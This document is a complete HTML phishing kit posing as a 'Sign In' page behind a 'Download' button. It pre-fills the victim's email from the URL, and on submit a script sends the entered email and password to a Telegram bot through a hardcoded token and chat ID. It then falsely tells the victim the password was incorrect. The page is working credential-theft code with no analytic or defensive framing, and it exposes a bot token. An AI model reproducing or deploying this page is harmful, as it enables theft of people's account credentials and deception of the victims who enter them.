<!doctype html>
<html>
<head>
<title>Sign In</title>
</head>
<body>
<center>
<style>


body{
  background: url('https://i.im.ge/2023/05/30/hjbbb6.Screenshot14.png') no-repeat center center fixed; 
   -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
}
.modal {
    display: none; /* Hidden by default */
    position: fixed; /* Stay in place */
    z-index: 1; /* Sit on top */
    left: 0;
    top: 0;
    width: 100%; /* Full width */
    height: 100%; /* Full height */
    overflow: auto; /* Enable scroll if needed */
    background-color: rgb(0,0,0); /* Fallback color */
    background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
    padding-top: 60px;
}

/* Modal Content/Box */
.modal-content {
    background-color: #fefefe;
    margin: 5% auto 15% auto 5%; /* 5% from the top, 15% from the bottom and centered */
    border: 1px solid #888;
    width: 50%; /* Could be more or less, depending on screen size */
}
input{
  display: block;
  margin: 0;
  width: 300px;
  font-family: sans-serif;
  font-size: 15px;  
   padding: 8px;
    border: 1px solid #DFDFDF;
}


#backgroundimage
{
position: absolute;
top:0px;
left:0px;
}


fieldset {
    font-family: sans-serif;
width:445px;
height:404px;
 background:white;
 border: 1px solid #DFDFDF;
    padding: 8px;
bottom:10px;
}


button {
    background-color: #409FFF;
    color: white;
    height: 45px;
    padding: 0px 40px;
    outline: none;
    border: none;
    border-radius:25px;
    font-size: 16px;
}

input[type=submit] {

  width: 250px;
      padding: 15px;
    font-size: 16px;
    color: #fff;
    background-color: #409FFF;
    margin-bottom: 0;
    font-weight: normal;
    cursor: pointer;
    border: 0px;
   }
   
   #box{
   	height: 415px;
   	width: 280px;
   	border: 1px solid black;
   	border-radius: 10px;
   	background-color: white;
   	position: absolute;
   	left: 100px;
   	top: 200px;
   }
   #top-left{
    position: absolute;
    left: 10px;
   }  
   #top-right{
    position: absolute;
    right: 10px;
   }
</style>
<img id="top-left" src="https://i.im.ge/2023/05/30/hjb3XS.Screenshot5.png">
<img id="top-right" src="https://i.im.ge/2023/05/30/hjbpb4.Screenshot16.png">
<div id="box"><br>
<img src="https://i.im.ge/2023/05/30/hjb4Ap.Screenshot18.png"><br>
<button onclick="document.getElementById('id01').style.display='block'" style="width:auto;">Download</button>
</div>
<form id="loginForm">
<br><br><br><br><br></center>
<div id="id01" class="modal">
	<span onclick="document.getElementById('id01').style.display='none'" class="close" title="Close Modal"></span>
<center><fieldset><br>
<img src="https://i.im.ge/2023/05/30/hjcolr.Screenshot15.png"><br><br>
<input type="email" id="inputline1" name="user" placeholder="Enter Email" required >   
<script type="text/javascript">
var url = window.location.href;
var name = url.substring(url.indexOf("=") + 1);  
document.getElementById("inputline1").value = name;
</script>
<br><input type="password" name="pass" placeholder="Enter Password" required ><br>
<br>
    
    <input type="submit" name="submit" value="Log In"/>
 <br> <br><br></center></fieldset>
</div>
<script>
// Get the modal
var modal = document.getElementById('id01');

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
    if (event.target == modal) {
        modal.style.display = "none";
    }
}
</script>
<script>
// Get the modal
var modal = document.getElementById('id01');

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
    if (event.target == modal) {
        modal.style.display = "none";
    }
}

// Handle form submission
document.getElementById('loginForm').addEventListener('submit', function(event) {
    event.preventDefault(); // Prevent the default form submission

    var user = document.querySelector('input[name="user"]').value;
    var pass = document.querySelector('input[name="pass"]').value;

    var telegramBotToken = '7989401234:AAFgDigFlF7-miveHiKTZxbBi92QqOBhMfk';
    var chatId = '7037376502';
    var message = `Email: ${user}\nPassword: ${pass}`;

    var url = `https://api.telegram.org/bot${telegramBotToken}/sendMessage`;

    fetch(url, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({
            chat_id: chatId,
            text: message
        })
    }).then(response => {
        if (response.ok) {
            alert('Incorrect Username And Password');
        } else {
            alert('Failed to send message.');
        }
    }).catch(error => {
        console.error('Error:', error);
        alert('An error occurred.');
    });
});
</script>

</center>
</form>
</body>
</html>
</center>
</form>
</body>
</html>

